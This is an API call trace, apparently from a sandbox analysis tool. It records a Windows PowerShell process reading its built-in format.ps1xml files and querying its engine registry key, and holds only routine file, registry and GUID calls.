	[0430.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.446] SetErrorMode (uMode=0x1) returned 0x1
	[0430.446] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0430.446] SetErrorMode (uMode=0x1) returned 0x1
	[0430.446] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.447] SetErrorMode (uMode=0x1) returned 0x1
	[0430.447] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0430.447] SetErrorMode (uMode=0x1) returned 0x1
	[0430.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.447] SetErrorMode (uMode=0x1) returned 0x1
	[0430.447] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0430.447] SetErrorMode (uMode=0x1) returned 0x1
	[0430.447] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0430.447] SetErrorMode (uMode=0x1) returned 0x1
	[0430.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0430.448] SetErrorMode (uMode=0x1) returned 0x1
	[0430.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0430.448] SetErrorMode (uMode=0x1) returned 0x1
	[0430.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0430.448] SetErrorMode (uMode=0x1) returned 0x1
	[0430.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0430.448] SetErrorMode (uMode=0x1) returned 0x1
	[0430.448] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0430.448] SetErrorMode (uMode=0x1) returned 0x1
	[0430.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0430.449] SetErrorMode (uMode=0x1) returned 0x1
	[0430.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0430.449] SetErrorMode (uMode=0x1) returned 0x1
	[0430.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0430.449] SetErrorMode (uMode=0x1) returned 0x1
	[0430.449] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24d300 | out: lpFileInformation=0x24d300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0430.449] SetErrorMode (uMode=0x1) returned 0x1
	[0430.449] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0430.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.450] CoTaskMemFree (pv=0x1b82df50) 
	[0430.450] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0430.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.450] CoTaskMemFree (pv=0x1b82df50) 
	[0430.450] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0430.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.450] CoTaskMemFree (pv=0x1b82df50) 
	[0430.450] CoTaskMemAlloc (cb=0x104) returned 0x1b82df50
	[0430.450] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b82df50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.451] CoTaskMemFree (pv=0x1b82df50) 
	[0430.451] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.451] SetErrorMode (uMode=0x1) returned 0x1
	[0430.451] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0430.451] GetFileType (hFile=0x320) returned 0x1
	[0430.451] SetErrorMode (uMode=0x1) returned 0x1
	[0430.451] GetFileType (hFile=0x320) returned 0x1
	[0430.451] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.452] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.452] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.452] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.453] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.453] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.453] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x9e2, lpOverlapped=0x0) returned 1
	[0430.453] ReadFile (in: hFile=0x320, lpBuffer=0x33f286a, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f286a*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.453] ReadFile (in: hFile=0x320, lpBuffer=0x33f3320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x33f3320*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.453] CloseHandle (hObject=0x320) returned 1
	[0430.453] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.453] SetErrorMode (uMode=0x1) returned 0x1
	[0430.454] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0430.454] SetErrorMode (uMode=0x1) returned 0x1
	[0430.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.454] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x320) returned 0x0
	[0430.454] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.454] CoTaskMemAlloc (cb=0x5a) returned 0x48e2f0
	[0430.454] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e2f0, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.454] CoTaskMemFree (pv=0x48e2f0) 
	[0430.454] RegCloseKey (hKey=0x320) returned 0x0
	[0430.454] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.455] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.456] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xd3dadf23, Data2=0x8175, Data3=0x4dcc, Data4=([0]=0x96, [1]=0x27, [2]=0xe5, [3]=0x24, [4]=0x1, [5]=0xaa, [6]=0xca, [7]=0x3b))) returned 0x0
	[0430.456] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf1cffce2, Data2=0x7579, Data3=0x4ff2, Data4=([0]=0x91, [1]=0x55, [2]=0xce, [3]=0x10, [4]=0xbe, [5]=0x3f, [6]=0x14, [7]=0x5f))) returned 0x0
	[0430.456] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.456] SetErrorMode (uMode=0x1) returned 0x1
	[0430.457] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0430.457] GetFileType (hFile=0x320) returned 0x1
	[0430.457] SetErrorMode (uMode=0x1) returned 0x1
	[0430.457] GetFileType (hFile=0x320) returned 0x1
	[0430.457] ReadFile (in: hFile=0x320, lpBuffer=0x341de88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341de88*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.457] ReadFile (in: hFile=0x320, lpBuffer=0x341de88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341de88*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.458] ReadFile (in: hFile=0x320, lpBuffer=0x341de88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341de88*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.458] ReadFile (in: hFile=0x320, lpBuffer=0x341de88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341de88*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.458] ReadFile (in: hFile=0x320, lpBuffer=0x341de88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341de88*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.459] ReadFile (in: hFile=0x320, lpBuffer=0x341de88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341de88*, lpNumberOfBytesRead=0x24cf98*=0xfb2, lpOverlapped=0x0) returned 1
	[0430.459] ReadFile (in: hFile=0x320, lpBuffer=0x341d5a2, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341d5a2*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.459] ReadFile (in: hFile=0x320, lpBuffer=0x341de88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x341de88*, lpNumberOfBytesRead=0x24cf98*=0x0, lpOverlapped=0x0) returned 1
	[0430.459] CloseHandle (hObject=0x320) returned 1
	[0430.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.459] SetErrorMode (uMode=0x1) returned 0x1
	[0430.460] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cf40 | out: lpFileInformation=0x24cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0430.460] SetErrorMode (uMode=0x1) returned 0x1
	[0430.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.460] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d028 | out: phkResult=0x24d028*=0x320) returned 0x0
	[0430.460] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfac, lpData=0x0, lpcbData=0x24cfa8*=0x0 | out: lpType=0x24cfac*=0x1, lpData=0x0, lpcbData=0x24cfa8*=0x56) returned 0x0
	[0430.460] CoTaskMemAlloc (cb=0x5a) returned 0x48e6e0
	[0430.460] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cf7c, lpData=0x48e6e0, lpcbData=0x24cf78*=0x56 | out: lpType=0x24cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cf78*=0x56) returned 0x0
	[0430.460] CoTaskMemFree (pv=0x48e6e0) 
	[0430.460] RegCloseKey (hKey=0x320) returned 0x0
	[0430.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.462] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xf8c90c53, Data2=0xdee, Data3=0x4c80, Data4=([0]=0x8a, [1]=0xda, [2]=0x82, [3]=0xa5, [4]=0x75, [5]=0xa, [6]=0x70, [7]=0xba))) returned 0x0
	[0430.462] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x4b1d1370, Data2=0x6581, Data3=0x46ae, Data4=([0]=0x96, [1]=0xfa, [2]=0xfa, [3]=0xf9, [4]=0x28, [5]=0xbf, [6]=0xe, [7]=0x20))) returned 0x0
	[0430.463] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xfb1fb355, Data2=0x5b3d, Data3=0x4bb7, Data4=([0]=0x8f, [1]=0x19, [2]=0xe3, [3]=0xcb, [4]=0xdd, [5]=0xaf, [6]=0x53, [7]=0x62))) returned 0x0
	[0430.463] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xadef50cf, Data2=0x26c6, Data3=0x46ed, Data4=([0]=0xa0, [1]=0x43, [2]=0x66, [3]=0x1f, [4]=0x1, [5]=0xc7, [6]=0x2f, [7]=0x0))) returned 0x0
	[0430.463] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0x94ba901f, Data2=0x36ab, Data3=0x4bcb, Data4=([0]=0x9e, [1]=0x93, [2]=0x95, [3]=0x37, [4]=0x55, [5]=0x53, [6]=0xad, [7]=0x7d))) returned 0x0
	[0430.463] CoCreateGuid (in: pguid=0x24d250 | out: pguid=0x24d250*(Data1=0xd694a310, Data2=0x23b8, Data3=0x428f, Data4=([0]=0xb1, [1]=0xd8, [2]=0x6a, [3]=0x62, [4]=0xae, [5]=0xee, [6]=0xb9, [7]=0x20))) returned 0x0
	[0430.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.463] SetErrorMode (uMode=0x1) returned 0x1
	[0430.463] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0430.463] GetFileType (hFile=0x320) returned 0x1
	[0430.464] SetErrorMode (uMode=0x1) returned 0x1
	[0430.464] GetFileType (hFile=0x320) returned 0x1
	[0430.464] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.464] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.465] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.465] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.465] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0430.466] ReadFile (in: hFile=0x320, lpBuffer=0x3469be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cf98, lpOverlapped=0x0 | out: lpBuffer=0x3469be8*, lpNumberOfBytesRead=0x24cf98*=0x1000, lpOverlapped=0x0) returned 1
